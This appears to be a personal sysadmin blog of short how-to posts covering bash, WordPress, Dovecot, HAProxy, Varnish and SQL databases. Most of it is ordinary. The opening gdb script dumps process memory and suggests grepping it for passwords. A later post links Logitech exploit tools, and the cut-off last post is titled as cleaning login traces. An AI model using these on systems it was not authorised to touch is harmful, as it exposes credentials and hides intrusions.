How to dump the memory of a process on Linux

#!/bin/bash
grep rw-p /proc/$1/maps \
| sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' \
| while read start stop; do
    gdb --batch --pid $1 -ex \
        "dump memory $1-$start-$stop.dump 0x$start 0x$stop"
done

Put this in a file (e.g. "dump-memory.sh") and make it executable.
Usage: ./dump-memory.sh [pid]
The output is written to files named: pid-startaddress-stopaddress.dump
Dependencies: gdb

Get the PID of your process:

pgrep -u root processname

Dump the process's memory:

mkdir /tmp/process_dump && cd /tmp/process_dump
sh /path/to/dump-memory.sh [pid]
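Once the dumps are written, you can search them for readable content. A quick sketch (the dump filename pattern is the one the script produces; the search string is just an example):

```shell
# grep -a treats the binary dump files as text; -l lists only matching file names
grep -al "PASSWORD" ./*.dump
```

strings(1) from binutils is another option for listing all printable text in a dump, if it is installed.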


Auteur : Harlok

2020-10-16 13:14:39

Some bash programming helpers

How to AND two expressions (e.g. -z and -e) in an if:

expression1 && expression2 - true if both expression1 and expression2 are true.

if [ ! -z "$var" ] && [ -e "$var" ]; then
    echo "'$var' is non-empty and the file exists"
fi

if [[ -n "$var" && -e "$var" ]]; then
    echo "'$var' is non-empty and the file exists"
fi

Subtract two variables in Bash :
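A minimal sketch using arithmetic expansion:

```shell
a=10
b=3
diff=$((a - b))   # $(( )) performs integer arithmetic on the two variables
echo "$diff"      # prints 7
```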


How to check if a string contains a substring in Bash :

string='My long string'
if [[ $string == *"My long"* ]]; then
    echo "It's there!"
fi

string='My string'
if [[ $string =~ "My" ]]; then
    echo "It's there!"
fi

if grep -q foo <<<"$string"; then
    echo "It's there"
fi
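A third, POSIX-portable option is a case statement, which needs no [[ ]] at all:

```shell
string='My long string'
case "$string" in
  *"My long"*) echo "It's there!" ;;   # glob pattern match against the substring
  *)           echo "Not found"  ;;
esac
```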

Compare Numbers in Linux Shell Script :

$num1 -eq $num2 checks if the 1st number is equal to the 2nd number
$num1 -ge $num2 checks if the 1st number is greater than or equal to the 2nd number
$num1 -gt $num2 checks if the 1st number is greater than the 2nd number
$num1 -le $num2 checks if the 1st number is less than or equal to the 2nd number
$num1 -lt $num2 checks if the 1st number is less than the 2nd number
$num1 -ne $num2 checks if the 1st number is not equal to the 2nd number
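For example, these operators are used inside [ ] (or [[ ]]):

```shell
num1=10
num2=20
if [ "$num1" -lt "$num2" ]; then   # -lt: numeric "less than"
  echo "$num1 is less than $num2"
fi
```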

Compare Strings in Linux Shell Script :

$var1 = $var2 checks if var1 is the same string as var2
$var1 != $var2 checks if var1 is not the same as var2
$var1 < $var2 checks if var1 sorts before var2 (escape as \< inside [ ])
$var1 > $var2 checks if var1 sorts after var2 (escape as \> inside [ ])
-n $var1 checks if var1 has a length greater than zero
-z $var1 checks if var1 has a length of zero

File comparison in Linux Shell Script

-d $file checks if the file exists and is a directory
-e $file checks if the file exists on system
-w $file checks if the file exists on system and if it is writable
-r $file checks if the file exists on system and it is readable
-s $file checks if the file exists on system and it is not empty
-f $file checks if the file exists on system and it is a file
-O $file checks if the file exists on system and is owned by the current user
-G $file checks if the file exists and its group matches the current user's group
-x $file checks if the file exists on system and is executable
$fileA -nt $fileB checks if file A is newer than file B
$fileA -ot $fileB checks if file A is older than file B
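A small sketch combining several of these tests on a temporary file:

```shell
file=$(mktemp)                 # create an empty temporary file
if [ -e "$file" ] && [ -f "$file" ] && [ ! -s "$file" ]; then
  echo "exists, regular file, and empty"
fi
rm -f "$file"
```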

Auteur : Harlok

2020-10-16 13:22:18

Switching domain name on a wordpress

Switching WordPress Database

First, create a new MySQL database on the new server, then export the old MySQL database from the old server and import it into the new database on the new server. You can then fix all the WordPress site URLs in the database tables using phpMyAdmin. Here are the steps to follow:

Old URL – http://www.olddomain.com

New URL – http://www.newdomain.com

Log into your PHPMyAdmin profile
Select the database you would like to edit
Execute the following SQL queries

# main replace
UPDATE wp_options SET option_value = replace(option_value, 'http://www.olddomain.com', 'http://www.newdomain.com') WHERE option_name = 'home' OR option_name = 'siteurl';

# replace www and non-ssl
UPDATE wp_posts SET guid = replace(guid, 'http://www.olddomain.com', 'http://www.newdomain.com');
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.olddomain.com', 'http://www.newdomain.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'http://www.olddomain.com', 'http://www.newdomain.com');
UPDATE wp_options SET option_value = replace(option_value, 'http://www.olddomain.com', 'http://www.newdomain.com') WHERE option_name = 'home' OR option_name = 'siteurl';

# replace www & SSL
UPDATE wp_posts SET guid = replace(guid, 'https://www.olddomain.com', 'https://www.newdomain.com');
UPDATE wp_posts SET post_content = replace(post_content, 'https://www.olddomain.com', 'https://www.newdomain.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'https://www.olddomain.com', 'https://www.newdomain.com');
UPDATE wp_options SET option_value = replace(option_value, 'https://www.olddomain.com', 'https://www.newdomain.com') WHERE option_name = 'home' OR option_name = 'siteurl';

# replace non-www
UPDATE wp_posts SET guid = replace(guid, 'http://olddomain.com', 'http://newdomain.com');
UPDATE wp_posts SET post_content = replace(post_content, 'http://olddomain.com', 'http://newdomain.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'http://olddomain.com', 'http://newdomain.com');
UPDATE wp_options SET option_value = replace(option_value, 'http://olddomain.com', 'http://newdomain.com') WHERE option_name = 'home' OR option_name = 'siteurl';

# replace non-www and SSL
UPDATE wp_posts SET guid = replace(guid, 'https://olddomain.com', 'https://newdomain.com');
UPDATE wp_posts SET post_content = replace(post_content, 'https://olddomain.com', 'https://newdomain.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'https://olddomain.com', 'https://newdomain.com');

Once you have modified the URLs, run the SQL queries by pressing the Go button at the bottom.

The next step is updating your WordPress config file (wp-config.php) to reflect the above changes. The configuration file should be in your web document root. You need to change the username, password, database name, and host values. Here are the steps to follow.

Updating your wp-config.php file

Using your hosting account editor, open your wp-config.php file.
Add two lines to the file which defines the new location of your website.

Locate for a section that looks like this

define('DB_NAME', 'yourdbnamehere');

/** MySQL database username */

define('DB_USER', 'usernamehere');

/** MySQL database password */

define('DB_PASSWORD', 'passwordhere');

/** MySQL hostname */

define('DB_HOST', 'localhost');

Note – enter the database information from your database as follows

yourdbnamehere is your MySQL database name
usernamehere is your MySQL username
passwordhere is your MySQL password
localhost is your MySQL host name

Save modifications to wp-config.php file


Auteur : Harlok

2020-10-15 18:53:40

Mail server master/master replication with SSL using dovecot

Dovecot master/master replication using dsync.

Configuration with SSL

Make sure that user listing is configured for your userdb, this is required by replication to find the list of users that are periodically replicated:

doveadm user '*'
this command must list all users.

I) Enable the replication plugin globally; most likely you'll do this in 10-mail.conf :
mail_plugins = $mail_plugins notify replication

II) Then in conf.d/30-dsync.conf :

service aggregator {
  fifo_listener replication-notify-fifo {
    user = vmail
  }
  unix_listener replication-notify {
    user = vmail
  }
}

service replicator {
  process_min_avail = 1
  unix_listener replicator-doveadm {
    mode = 0600
    user = vmail
  }
}

replication_max_conns = 10

service doveadm {
  user = vmail
  inet_listener {
    # port to listen on
    port = $port
    # enable SSL
    ssl = yes
  }
}

doveadm_port = $port
doveadm_password = "$password"
# use the same password on the other master

plugin {
  mail_replica = tcps:$targethostname:$port
  # be sure to use the same name as the one provided for the SSL cert.
}

service config {
  unix_listener config {
    user = vmail
  }
}

III) In conf.d/10-ssl.conf :
ssl = yes
ssl_cert = </etc/ssl/certs/chain.domain.crt
ssl_key = </etc/ssl/private/private.domain.key
ssl_client_ca_dir = /etc/ssl/certs/

IV) service dovecot restart
V) Do the same for the other master and replace $targethostname by the 1st one you configured

VI) If the configuration is correct, run the following to check the status of syncing:
doveadm replicator status '*'
You should see the syncing in progress.

doveadm replicator command :

Replicate a given email account manually
doveadm replicator replicate 'email'
Replicate a given email account manually IN FULL
doveadm replicator replicate -f 'email'
Check replication status. Also works without the email parameter.
doveadm replicator status 'email'
In case you have duplicates (use with care) :
doveadm deduplicate -u 'email' -m ALL

Auteur : Harlok

2020-07-05 02:32:31

Cryptpad the online private Office tools

Bye bye google docs, Welcome privacy !

In this article I'll show you an alternative to Google Docs: CryptPad.

In your enterprise you don't want your employees to share your documentation with someone external.
But many of them will use Google Docs if you don't deploy an alternative solution,
and then Google has access to all your information.

Here comes CryptPad! It has word processing, sheets, code, kanban, presentations, a whiteboard and even a drive!

Best of all, it is open source, actively maintained, and... has client-side encryption; more documentation here!

It's easily deployed in containers or as a standard installation with Node.
It doesn't provide anonymity, but it has a lot of qualities.

I've been using it for more than a year; it's tested and approved.
Here is my cryptpad instance

Auteur : Harlok

2020-06-17 19:20:07

Haproxy SSH

When you setup a proxy for SSH the configuration is slightly different than for HTTP:

maxconn 10000

timeout connect 500s
timeout client 5000s
timeout server 1h

frontend ssh1
    bind *:2021
    mode tcp
    default_backend ssh1
    timeout client 1h

frontend ssh2
    bind *:2022
    mode tcp
    default_backend ssh2
    timeout client 1h

backend ssh1
    mode tcp
    server ssh your.ssh.host1:22    # replace with your SSH server address

backend ssh2
    mode tcp
    server ssh your.ssh.host2:22    # replace with your SSH server address

Auteur : Harlok

2020-03-20 09:41:34

MySQL Basic Commands

Connection :
mysql -u root -p

create database `example`;

create user 'user'@'localhost' identified by 'password';

grant all privileges on `example`.* to 'user'@'localhost';

flush privileges;

show databases;

Auteur : Harlok

2020-02-05 18:15:56

Varnish commands and wordpress vcl

Test VCL compilation :
varnishd -C -f /etc/varnish/yourvcl.vcl

Check log :
varnishlog -q 'RespStatus == 503' -g request

Wordpress vcl 4.0 :
vcl 4.0;
# Based on:

import std;
import directors;

backend server1 { # Define one backend
    .host = "";                 # IP or Hostname of backend
    .port = "80";               # Port Apache or whatever is listening
    .max_connections = 300;     # That's it

    .probe = {
        #.url = "/"; # short easy way (GET /)
        # We prefer to only do a HEAD /
        .request =
            "HEAD / HTTP/1.1"
            "Host: localhost"
            "Connection: close"
            "User-Agent: Varnish Health Probe";

        .interval = 5s;  # check the health of each backend every 5 seconds
        .timeout = 1s;   # timing out after 1 second
        .window = 5;     # If 3 out of the last 5 polls succeeded the backend is considered healthy, otherwise it will be marked as sick
        .threshold = 3;
    }

    .first_byte_timeout = 300s;   # How long to wait before we receive a first byte from our backend?
    .connect_timeout = 5s;        # How long to wait for a backend connection?
    .between_bytes_timeout = 2s;  # How long to wait between bytes received from our backend?
}

acl purge {
    # ACL we'll use later to allow purges
    "localhost";
}

acl editors {
    # ACL to honor the "Cache-Control: no-cache" header to force a refresh but only from selected IPs
    "localhost";
}

sub vcl_init {
    # Called when VCL is loaded, before any requests pass through it.
    # Typically used to initialize VMODs.

    new vdir = directors.round_robin();
    vdir.add_backend(server1);
    # vdir.add_backend(servern);
}

sub vcl_recv {
    # Called at the beginning of a request, after the complete request has been received and parsed.
    # Its purpose is to decide whether or not to serve the request, how to do it, and, if applicable,
    # which backend to use.
    # Also used to modify the request.

    set req.backend_hint = vdir.backend(); # send all traffic to the vdir director

    # Normalize the header, remove the port (in case you're testing this on various TCP ports)
    set req.http.Host = regsub(req.http.Host, ":[0-9]+", "");

    # Remove the proxy header (see httpoxy)
    unset req.http.proxy;

    # Normalize the query arguments
    set req.url = std.querysort(req.url);

    # Allow purging
    if (req.method == "PURGE") {
        if (!client.ip ~ purge) { # purge is the ACL defined at the beginning
            # Not from an allowed IP? Then die with an error.
            return (synth(405, "This IP is not allowed to send PURGE requests."));
        }
        # If you got to this stage (and didn't error out above), purge the cached result
        return (purge);
    }

    # Only deal with "normal" types
    if (req.method != "GET" &&
        req.method != "HEAD" &&
        req.method != "PUT" &&
        req.method != "POST" &&
        req.method != "TRACE" &&
        req.method != "OPTIONS" &&
        req.method != "PATCH" &&
        req.method != "DELETE") {
        /* Non-RFC2616 or CONNECT which is weird. */
        /* Why send the packet upstream, while the visitor is using a non-valid HTTP method? */
        return (synth(404, "Non-valid HTTP method!"));
    }

    # Implementing websocket support
    if (req.http.Upgrade ~ "(?i)websocket") {
        return (pipe);
    }

    # Only cache GET or HEAD requests. This makes sure the POST requests are always passed.
    if (req.method != "GET" && req.method != "HEAD") {
        return (pass);
    }

    # Some generic URL manipulation, useful for all templates that follow
    # First remove URL parameters used to track effectiveness of online marketing campaigns
    if (req.url ~ "(\?|&)(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=") {
        set req.url = regsuball(req.url, "(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=[-_A-z0-9+()%.]+&?", "");
        set req.url = regsub(req.url, "[?|&]+$", "");
    }

    # Strip hash, server doesn't need it.
    if (req.url ~ "\#") {
        set req.url = regsub(req.url, "\#.*$", "");
    }

    # Strip a trailing ? if it exists
    if (req.url ~ "\?$") {
        set req.url = regsub(req.url, "\?$", "");
    }

    # Some generic cookie manipulation, useful for all templates that follow
    # Remove the "has_js" cookie
    set req.http.Cookie = regsuball(req.http.Cookie, "has_js=[^;]+(; )?", "");

    # Remove any Google Analytics based cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "_ga=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "_gat=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=[^;]+(; )?", "");
    set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=[^;]+(; )?", "");

    # Remove DoubleClick offensive cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__gads=[^;]+(; )?", "");

    # Remove the Quant Capital cookies (added by some plugin, all __qca)
    set req.http.Cookie = regsuball(req.http.Cookie, "__qc.=[^;]+(; )?", "");

    # Remove the AddThis cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=[^;]+(; )?", "");

    # Remove a ";" prefix in the cookie if present
    set req.http.Cookie = regsuball(req.http.Cookie, "^;\s*", "");

    # Are there cookies left with only spaces or that are empty?
    if (req.http.cookie ~ "^\s*$") {
        unset req.http.cookie;
    }

    #if (req.http.Cache-Control ~ "(?i)no-cache") {
    #if (req.http.Cache-Control ~ "(?i)no-cache" && client.ip ~ editors) { # create the acl editors if you want to restrict the Ctrl-F5
    #    # Ignore requests via proxy caches and badly behaved crawlers
    #    # like msnbot that send no-cache with every request.
    #    if (! (req.http.Via || req.http.User-Agent ~ "(?i)bot" || req.http.X-Purge)) {
    #        #set req.hash_always_miss = true; # Doesn't seem to refresh the object in the cache
    #        return (purge); # Couple this with restart in vcl_purge and X-Purge header to avoid loops
    #    }
    #}

    # Large static files are delivered directly to the end-user without
    # waiting for Varnish to fully read the file first.
    # Varnish 4 fully supports Streaming, so set do_stream in vcl_backend_response()
    if (req.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
        unset req.http.Cookie;
        return (hash);
    }

    # Remove all cookies for static files
    # A valid discussion could be held on this line: do you really need to cache static files that don't cause load? Only if you have memory left.
    # Sure, there's disk I/O, but chances are your OS will already have these files in their buffers (thus memory).
    if (req.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
        unset req.http.Cookie;
        return (hash);
    }

    # Send Surrogate-Capability headers to announce ESI support to backend
    set req.http.Surrogate-Capability = "key=ESI/1.0";

    if (req.http.Authorization) {
        # Not cacheable by default
        return (pass);
    }

    return (hash);
}

sub vcl_pipe {
    # Called upon entering pipe mode.
    # In this mode, the request is passed on to the backend, and any further data from both the client
    # and backend is passed on unaltered until either end closes the connection. Basically, Varnish will
    # degrade into a simple TCP proxy, shuffling bytes back and forth. For a connection in pipe mode,
    # no other VCL subroutine will ever get called after vcl_pipe.

    # Note that only the first request to the backend will have
    # X-Forwarded-For set. If you use X-Forwarded-For and want to
    # have it set for all requests, make sure to have:
    # set bereq.http.connection = "close";
    # here. It is not set by default as it might break some broken web
    # applications, like IIS with NTLM authentication.

    # set bereq.http.Connection = "Close";

    # Implementing websocket support
    if (req.http.upgrade) {
        set bereq.http.upgrade = req.http.upgrade;
    }

    return (pipe);
}

sub vcl_pass {
    # Called upon entering pass mode. In this mode, the request is passed on to the backend, and the
    # backend's response is passed on to the client, but is not entered into the cache. Subsequent
    # requests submitted over the same client connection are handled normally.

    # return (pass);
}

# The data on which the hashing will take place
sub vcl_hash {
    # Called after vcl_recv to create a hash value for the request. This is used as a key
    # to look up the object in Varnish.

    hash_data(req.url);

    if (req.http.host) {
        hash_data(req.http.host);
    } else {
        hash_data(server.ip);
    }

    # hash cookies for requests that have them
    if (req.http.Cookie) {
        hash_data(req.http.Cookie);
    }
}

sub vcl_hit {
    # Called when a cache lookup is successful.

    if (obj.ttl >= 0s) {
        # A pure unadulterated hit, deliver it
        return (deliver);
    }

    # When several clients are requesting the same page Varnish will send one request to the backend and place the
    # others on hold while fetching one copy from the backend. In some products this is called request coalescing and
    # Varnish does this automatically.
    # If you are serving thousands of hits per second the queue of waiting requests can get huge. There are two
    # potential problems - one is a thundering herd problem - suddenly releasing a thousand threads to serve content
    # might send the load sky high. Secondly - nobody likes to wait. To deal with this we can instruct Varnish to keep
    # the objects in cache beyond their TTL and to serve the waiting requests somewhat stale content.

    # if (!std.healthy(req.backend_hint) && (obj.ttl + obj.grace > 0s)) {
    #     return (deliver);
    # } else {
    #     return (miss);
    # }

    # We have no fresh fish. Let's look at the stale ones.
    if (std.healthy(req.backend_hint)) {
        # Backend is healthy. Limit age to 10s.
        if (obj.ttl + 10s > 0s) {
            #set req.http.grace = "normal(limited)";
            return (deliver);
        } else {
            # No candidate for grace. Fetch a fresh object.
            return (fetch);
        }
    } else {
        # Backend is sick - use full grace
        if (obj.ttl + obj.grace > 0s) {
            #set req.http.grace = "full";
            return (deliver);
        } else {
            # No graced object.
            return (fetch);
        }
    }

    # fetch & deliver once we get the result
    return (fetch); # Dead code, keep as a safeguard
}

sub vcl_miss {
    # Called after a cache lookup if the requested document was not found in the cache. Its purpose
    # is to decide whether or not to attempt to retrieve the document from the backend, and which
    # backend to use.

    return (fetch);
}

# Handle the HTTP response coming from our backend
sub vcl_backend_response {
    # Called after the response headers have been successfully retrieved from the backend.

    # Parse ESI requests and remove the Surrogate-Control header
    if (beresp.http.Surrogate-Control ~ "ESI/1.0") {
        unset beresp.http.Surrogate-Control;
        set beresp.do_esi = true;
    }

    # Enable cache for all static files
    # The same argument as the static caches from above: monitor your cache size, if you get data nuked out of it,
    # consider giving up the static file cache.
    if (bereq.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
        unset beresp.http.set-cookie;
    }

    # Large static files are delivered directly to the end-user without
    # waiting for Varnish to fully read the file first.
    # Varnish 4 fully supports Streaming, so use streaming here to avoid locking.
    if (bereq.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
        unset beresp.http.set-cookie;
        set beresp.do_stream = true; # Check memory usage: it'll grow in fetch_chunksize blocks (128k by default) if the backend doesn't send a Content-Length header, so only enable it for big objects
    }

    # Sometimes, a 301 or 302 redirect formed via Apache's mod_rewrite can mess with the HTTP port that is being passed along.
    # This often happens with simple rewrite rules in a scenario where Varnish runs on :80 and Apache on :8080 on the same box.
    # A redirect can then often redirect the end-user to a URL on :8080, where it should be :80.
    # This may need finetuning on your setup.
    # To prevent accidental replace, we only filter the 301/302 redirects for now.
    if (beresp.status == 301 || beresp.status == 302) {
        set beresp.http.Location = regsub(beresp.http.Location, ":[0-9]+", "");
    }

    # Don't cache 50x responses
    if (beresp.status == 500 || beresp.status == 502 || beresp.status == 503 || beresp.status == 504) {
        return (abandon);
    }

    # Set a short (2 min) lifetime for responses we can't cache properly
    if (beresp.ttl <= 0s || beresp.http.Set-Cookie || beresp.http.Vary == "*") {
        set beresp.ttl = 120s; # Important, you shouldn't rely on this, SET YOUR HEADERS in the backend
        set beresp.uncacheable = true;
        return (deliver);
    }

    # Allow stale content, in case the backend goes down.
    # Make Varnish keep all objects for 6 hours beyond their TTL.
    set beresp.grace = 6h;

    return (deliver);
}

# The routine when we deliver the HTTP response to the user
# Last chance to modify headers that are sent to the client
sub vcl_deliver {
    # Called before a cached object is delivered to the client.

    if (obj.hits > 0) { # Add debug header to see if it's a HIT/MISS and the number of hits, disable when not needed
        set resp.http.X-Cache = "HIT";
    } else {
        set resp.http.X-Cache = "MISS";
    }

    # Please note that obj.hits behaviour changed in 4.0, now it counts per objecthead, not per object
    # and obj.hits may not be reset in some cases where bans are in use. See bug 1492 for details.
    # So take hits with a grain of salt.
    set resp.http.X-Cache-Hits = obj.hits;

    # Remove some headers: PHP version
    unset resp.http.X-Powered-By;

    # Remove some headers: Apache version & OS
    unset resp.http.Server;
    unset resp.http.X-Drupal-Cache;
    unset resp.http.X-Varnish;
    unset resp.http.Via;
    unset resp.http.Link;
    unset resp.http.X-Generator;

    return (deliver);
}

sub vcl_purge {
    # Only handle actual PURGE HTTP methods, everything else is discarded
    if (req.method == "PURGE") {
        # Restart the request
        set req.http.X-Purge = "Yes";
        return (restart);
    }
}

sub vcl_synth {
    if (resp.status == 720) {
        # We use this special error status 720 to force redirects with 301 (permanent) redirects
        # To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
        set resp.http.Location = resp.reason;
        set resp.status = 301;
        return (deliver);
    } elsif (resp.status == 721) {
        # And we use error status 721 to force redirects with a 302 (temporary) redirect
        # To use this, call the following from anywhere in vcl_recv: return (synth(721, "http://host/new.html"));
        set resp.http.Location = resp.reason;
        set resp.status = 302;
        return (deliver);
    }

    return (deliver);
}

sub vcl_fini {
    # Called when VCL is discarded only after all requests have exited the VCL.
    # Typically used to clean up VMODs.

    return (ok);
}

Thanks Mattias Geniar

Auteur : Harlok

2020-10-16 09:09:38

PostgreSQL Command

Connecting :
# su - postgres

Connect to database :
$ psql
\c databasename
Describe tables :
\d
Help :
\? (psql commands) or \h (SQL commands)
Exit :
\q

Creating Roles
PostgreSQL grants access to databases based on roles; they are similar to 'users' in a Linux system. We can also create a set of roles, similar to 'groups' in Linux, and a user's access is determined by these roles. A role is created globally, so we don't have to create it again for another database on the same server.

To create a role, first connect to the database, then use CREATE USER:
postgres=# CREATE USER test;

Or we can also use the following:
postgres=# CREATE ROLE test;

To create a user with a password:
postgres=# CREATE USER test PASSWORD 'enter password here';

Check all roles
postgres=# \du

Delete a role
postgres=# DROP ROLE test;

Create a new Database
postgres=# CREATE DATABASE sysa;

Delete a database
postgres=# DROP DATABASE sysa;

List all database
postgres=# \l
postgres=# \list

Connect to a database
$ sudo -i -u test

then connect to the database with the following command:
$ psql -d sysa

Change to another database
Once connected to a database, we can switch to another one without having to repeat the whole process of logging in as the user and then connecting. We use the following command:
sysa=> \connect new_database

Create Table
To create a table, first connect to the desired database where the table is to be created. Next create table with the command,
sysa=> CREATE TABLE USERS (Serial_No int, First_Name varchar, Last_Name varchar);

Now insert some records into it,
sysa=> INSERT INTO USERS VALUES (1, 'Dan', 'Prince');

Check the table's data
sysa=> SELECT * FROM USERS;
and it will produce all the inserted data from the table USERS.

Delete a table
sysa=> DROP TABLE USERS;
List all the tables in a database
sysa=> \dt

Adding a column to a table
sysa=> ALTER TABLE USERS ADD date_of_birth date;

Updating a Row
sysa=> UPDATE USERS SET date_of_birth = '05-09-1999' WHERE Serial_No = '1';

Remove a Column
sysa=> ALTER TABLE USERS DROP date_of_birth;

Remove a Row
sysa=> DELETE FROM USERS WHERE Serial_No = '1';

sanitized from linuxtechlabs

Auteur : Harlok

2020-01-24 11:40:15

cat << EOF

Examples of cat <<EOF syntax usage in Bash:

Some rules about the Here tags:

The tag can be any string, uppercase or lowercase, though most people use uppercase by convention.
The tag will not be considered as a Here tag if there are other words in that line. In this case, it will merely be considered part of the string. The tag should be by itself on a separate line, to be considered a tag.
The tag should have no leading or trailing spaces in that line to be considered a tag. Otherwise it will be considered as part of the string.

1. Assign multi-line string to a shell variable

$ sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'
EOF
)

The $sql variable now holds the new-line characters too. You can verify with echo -e "$sql".
2. Pass multi-line string to a file in Bash

$ cat <<EOF > print.sh
echo \$PWD
echo $PWD
EOF

The file print.sh now contains:

echo $PWD
echo /home/user

3. Pass multi-line string to a pipe in Bash

$ cat <<EOF | grep 'b' | tee b.txt
foo
bar
baz
EOF

This prints the lines containing 'b' (bar, baz) and also writes them to b.txt.

$ cat >> test <<HERE
> Hello world HERE <-- Not by itself on a separate line -> not considered end of string
> This is a test
>  HERE <-- Leading space, so not considered end of string
> and a new line
> HERE <-- Now we have the end of the string


cat <<EOF >> script.sh
# Created on $(date) # <-- this will be evaluated before cat
echo "\$HOME will not be evaluated because it is backslash-escaped"
EOF
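One more rule worth knowing: quoting the delimiter (<<'EOF' instead of <<EOF) disables all expansion inside the here-document:

```shell
cat <<'EOF'
$HOME and $(date) are printed literally because the delimiter is quoted
EOF
```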

Auteur : Harlok

2019-12-19 13:42:00

How to send a mail with telnet

Here is an example to send a mail via telnet:

Replace smtp.example.com and the addresses with your own.
telnet smtp.example.com 25

HELO example.com
MAIL FROM: <sender@example.com>
RCPT TO: <recipient@example.com>
DATA
Subject: mail via telnet

this is a telnet mail
.
QUIT

It's done

Auteur : Harlok

2019-09-24 11:56:36

MySQL upgrade failed error

While upgrading a MySQL 8 database to the latest version, I got an error with the sysconfig file in the sys table.

This procedure is for when you're unable to start MySQL 8.

Even MySQL repair table was unable to repair the sys table.
You can try it, but if it fails, here is the procedure to repair a failed upgrade for MySQL 8.

- Start MySQL:

Add upgrade=MINIMAL to the my.cnf file (mysql_upgrade no longer exists).
systemctl start mysqld

- First dump all databases:

mysqldump -u root -p --all-databases > alldb.sql
Look up the documentation for mysqldump; you may want to use some of these options:
mysqldump -u root -p --opt --all-databases > alldb.sql
mysqldump -u root -p --all-databases --skip-lock-tables > alldb.sql
Check that routines & triggers are also saved.

- Stop MySQL:

systemctl stop mysqld

- Remove all the databases in the MySQL data directory :

rm -rf database/*

- Reinitialise :

Remove upgrade=MINIMAL from my.cnf
mysqld --initialize
Grab the new root password in the log file
cat log/mysqld.log

- Start MySQL

systemctl start mysqld

- Change root password

mysql -u root -p
Enter the temporary password, then change the root password to the real one:
ALTER USER 'root'@'localhost' IDENTIFIED BY 'your-new-password';

- Import the databases

mysql -u root -p < alldb.sql

It's done; now you've got a clean MySQL 8.

PS: I recommend dumping your databases before any upgrade.

Auteur : Harlok

2020-01-24 11:40:55

Oh shit, git!

You screwed up with your code go here

Auteur : Harlok

2019-08-07 13:36:01

Logitech wireless hacking

Logitech wireless vulnerabilities

Logitech wireless devices have vulnerabilities, and you need to patch your devices yourself because the manufacturer doesn't really know which devices are patched!
Here are the disclosure and the exploits Github repo.
A little article on zdnet

Tools for exploit

Here is a tool to exploit the vulns, and another one here

Finally the patch

Logitech's policy is cumbersome, and I don't recommend using Logitech wireless devices:
the exploit seems to work from 100 meters according to Mengs, yet Logitech says you should protect access to your devices?!
Here is the patch

Auteur : Harlok

2019-07-24 11:32:43

Ransomware victim ? Read this!

Translated from the korben article

My mailbox is always full, and desperate people constantly write to me because they "caught" a ransomware.

Here's my advice :

  • Take a deep breath

  • Write down the name of the ransomware and keep it somewhere

  • Remove the hard drive from your computer and put it in a box

  • Install a new hard drive

  • Make offline backups of your computer and install an antivirus

  • Finally, take a look from time to time at No More Ransom to see if a file decryptor is available for your ransomware

The decryption tools are on the No More Ransom page.
For example, the decryptor for GandCrab (1.5 million victims) is available.

If you followed this advice and kept the cursed disk, it may be time to reclaim what you own.

Auteur : Harlok

2019-06-18 16:43:48

Linux Display and Set Date From a Command Prompt

Linux Display Current Date and Time

You must be logged in as the root user to set the date; any user can display it.

Just type the date command:
$ date

Sample outputs:

Mon Jan 21 01:31:40 IST 2019

Linux Set Date Command Example

Use the following syntax to set a new date and time:

date --set="STRING"

For example, to set the date to 2 Oct 2006 18:00:00, type the following command as the root user:

# date -s "2 OCT 2006 18:00:00"


# date --set="2 OCT 2006 18:00:00"

You can also simplify the format using the following syntax:

# date +%Y%m%d -s "20081128"

Linux Set Time Examples

To set time use the following syntax:
# date +%T -s "10:13:13"


  • 10: Hour (hh)

  • 13: Minute (mm)

  • 13: Second (ss)

Use %p for the locale's equivalent of either AM or PM, enter:

# date +%T%p -s "6:10:30AM"

# date +%T%p -s "12:10:30PM"
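Putting the two halves together, the same format strings also work for displaying a parsed date (GNU date; -u avoids timezone surprises, -d parses an arbitrary date string without setting the clock):

```shell
# Parse a date string and print it in a custom format (read-only, no root needed)
date -u -d "2 OCT 2006 18:00:00" +"%Y-%m-%d %H:%M:%S"
# 2006-10-02 18:00:00
```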

Based on this article.

Auteur : Harlok

2019-07-24 14:23:59

How to remove / clean trace and history on linux

Remove login trace :

last /var/log/wtmp Lists successful login/logout history
